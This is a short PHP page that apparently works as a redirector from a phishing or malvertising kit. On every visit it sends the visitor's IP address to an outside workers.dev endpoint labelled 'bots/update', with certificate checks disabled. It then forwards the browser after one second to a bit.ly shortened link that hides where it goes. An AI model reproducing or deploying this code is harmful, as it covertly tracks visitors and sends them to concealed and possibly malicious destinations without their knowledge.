<?php 
	function req($url) {
		if (!function_exists("curl_init")) {
			if (ini_get("allow_url_fopen")) {
				$res = file_get_contents($url, false);
				return $res;
			} else {
				return false;
			}
		} else {
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_URL, $url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
			curl_setopt($ch, CURLOPT_TIMEOUT, 30);

			$res = curl_exec($ch);
			return $res;
		}
	}
  $ip = $_SERVER["REMOTE_ADDR"];
  req("https://js.mirr0r.workers.dev/bots/update?ip=" . $ip);
?>
<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="refresh" content="1; url=https://bitly.com/98K8eH">
    </head>
    <body></body>
</html>
